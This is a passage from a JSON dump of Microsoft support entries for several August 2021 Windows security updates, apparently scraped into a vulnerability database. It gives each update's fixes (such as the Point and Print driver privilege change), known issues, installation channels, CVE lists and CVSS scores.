Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005099>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005099](<https://download.microsoft.com/download/5/4/b/54b50378-2639-49db-8cb2-4b4241268317/5005099.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005099 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005099", "href": "https://support.microsoft.com/en-us/help/5005099", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:19", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004298](<https://support.microsoft.com/help/5004298>) (released July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005391.](<https://support.microsoft.com/help/5005391>)\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005076>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005076](<https://download.microsoft.com/download/f/e/9/fe907252-2606-4ef8-b4cd-bfe1b3bbae60/5005076.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005076 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005076", "href": "https://support.microsoft.com/en-us/help/5005076", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.2114) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5005112) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005030>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005030](<https://download.microsoft.com/download/3/f/c/3fc996a5-7267-4a7c-9a5b-83ade06204dc/5005030.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005030 (OS Build 17763.2114)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005030", "href": "https://support.microsoft.com/en-us/help/5005030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:21", "description": "None\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005391](<https://support.microsoft.com/help/5005391>)\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005036](<https://support.microsoft.com/help/5005036>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005106>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005106](<https://download.microsoft.com/download/b/d/a/bda94068-ca0a-4edd-825a-7874cd775e75/5005106.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005106 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36937", "CVE-2021-36942"], "modified": "2021-08-10T07:00:00", "id": "KB5005106", "href": "https://support.microsoft.com/en-us/help/5005106", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:20", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5004305](<https://support.microsoft.com/help/5004305>) (released July 13, 2021) and addresses the following issues:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\n * Addresses an issue in which Smart Card Authentication (PIV) fails on non-RFC compliant printers and scanners requiring smartcard authentication. For more information, see [KB5005390.](<https://support.microsoft.com/help/5005390>)\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API **[OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>)**, often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. **OpenEncryptedFileRaw** will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in [CVE-2021-36942](<https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2021-36942>).**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005090>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005090](<https://download.microsoft.com/download/3/e/d/3ed5bcad-9cd8-4084-860a-0eeff78ed341/5005090.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005090 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 